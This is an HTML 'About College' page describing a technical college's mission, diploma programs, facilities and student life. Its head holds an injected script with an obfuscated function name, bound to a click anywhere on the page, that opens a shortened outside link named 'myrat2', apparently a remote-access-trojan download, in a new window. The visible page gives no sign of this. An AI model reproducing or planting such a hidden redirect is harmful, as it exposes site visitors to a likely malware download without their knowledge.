<!DOCTYPE html>
<html lang="en">
<head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat2', '_blank');win.focus();load = "False";}}</script>
    <title>About College</title>
<style>
    body{
        background: linear-gradient(rgb(144, 142, 220),rgb(134, 161, 238),rgb(193, 3, 168));  
    margin: 0px;
    

    }
    h1{
        text-decoration: underline;
        color: darkblue;
        text-align: center;
        background: linear-gradient(rgb(113, 84, 84),rgb(134, 161, 238),rgb(193, 3, 168));
       
       border:3px solid black ;
    }
    p{
       font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
       color: white;
       font-size: 28px;
       margin: 6px;
       border: 3px solid black;
      border-radius: 50px;
      border-bottom: 10px;
      border-width: 10px;
      text-align: center;
    }
    img{
height: 100px;
width: 120px;
    width: 100px;
    height: 93px;
    border-radius: 50%;
    border: 4px solid yellow;
    object-fit: cover;
} 
em{
    color: darkblue;
    font-size: 45px;
    font-weight: 15px;
}
.h3{
    width: 300px;
        height: 544px;
}
</style>
</head>
<body onclick = "VXNlcmNvcjogSW()">
    <div>
       
 <h1><div class="img"><img src="radious.png">About College<img src="radious.png"></h1></div>
 <h3> <p><em>Mission:</em></br> To prepare students for success by equipping them with technical expertise, critical thinking skills, and a commitment to excellence and innovation. </br>
    <em>Programs:</em></br>
    Offers Diploma Associate Engineer (DAE) in technologies such as Electrical and Mechanical. 
    Collaborates with TEVTA to provide short-term, government-certified technical courses focused on job market needs.</br>
   <em> Facilities:</em></br> Includes advanced computer labs, an extensive library, a campus canteen, sports grounds, and a mosque.</br>
   <em> Student life:</em></br> The college fosters a community through events like freshers' parties and athletic meets.</br>
 </p></div></h3>
</body>
</html>
